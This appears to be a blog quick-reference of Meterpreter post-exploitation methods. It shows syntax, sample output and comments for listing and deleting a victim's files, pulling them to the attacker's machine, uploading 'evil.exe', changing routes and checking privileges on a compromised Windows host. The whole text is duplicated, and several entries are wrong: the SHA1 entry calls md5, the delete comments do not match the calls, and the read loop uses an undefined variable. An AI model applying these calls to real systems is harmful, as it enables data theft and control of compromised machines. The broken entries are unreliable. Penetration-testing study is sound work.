This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer.
Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.
Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts.
P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)
Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of c drive.
Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of c drive.
Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to c drive.
Make directory
Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in c drive.
Get current working directory
Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Delete a directory
Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Download contents of a target directory
Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.
Upload contents of a local directory to victim system
Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.
Get the file separator
Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for windows, \ for unix.
Search for the specified file
Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories
Get the basename for the specified file
Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.
Expand path of the directory
Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will give the absolute path of the shortcut specified
Get the md5 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file
Get the sha1 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
Check if specified file exists
Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false
Delete specified file
Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Upload file to victims system
Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from attackers system to victims oldman directory
Download file from victims system
Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from victims system and will save it to attackers root directory
Open a file in read mode and copy the content to some variable
Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
temp = ""
until file1.eof?
temp << file_object.read
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in temp variable
List all the available interface from victims system
Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Get the IP address of specified interface
Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.
List all the routes available in victims system
Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway
Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway
Add a route in victims system
Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.
Remove specified route from victims system
Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.
Get the user id
Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.
Get the victims computer name
Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.
Get the victims operating system name and version
Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the operating system name running on the compromised system.
Get the victims operating system architecture
Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.
Get the victims operating system language
Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give operating system language of the compromised system.
Revert to previous user privileges
Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab"
Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.
Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts.
P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)
Get all the files/folders in a directory
Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of c drive.
Get all the files/folders in a directory along with extra information
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of present working directory.
Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of c drive.
Change the directory
Output: 0
Comment: This will change the present working directory to c drive.
Make directory
Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" in c drive.
Get current working directory
Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Delete a directory
Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Download contents of a target directory
Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.
Upload contents of a local directory to victim system
Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.
Get the file separator
Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for windows, \ for unix.
Search for the specified file
Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories
Get the basename for the specified file
Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.
Expand path of the directory
Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will give the absolute path of the shortcut specified
Get the md5 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file
Get the sha1 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
Check if specified file exists
Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false
Delete specified file
Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will return true if file exists else false
Upload file to victims system
Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from attackers system to victims oldman directory
Download file from victims system
Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from victims system and will save it to attackers root directory
Open a file in read mode and copy the content to some variable
Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
temp = ""
until file1.eof?
temp << file_object.read
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in temp variable
List all the available interface from victims system
Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
Get the IP address of specified interface
Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.
List all the routes available in victims system
Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway
Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway
Add a route in victims system
Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.
Remove specified route from victims system
Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.
Get the user id
Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.
Get the victims computer name
Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.
Get the victims operating system name and version
Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the operating system name running on the compromised system.
Get the victims operating system architecture
Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.
Get the victims operating system language
Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give operating system language of the compromised system.
Revert to previous user privileges
Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab"
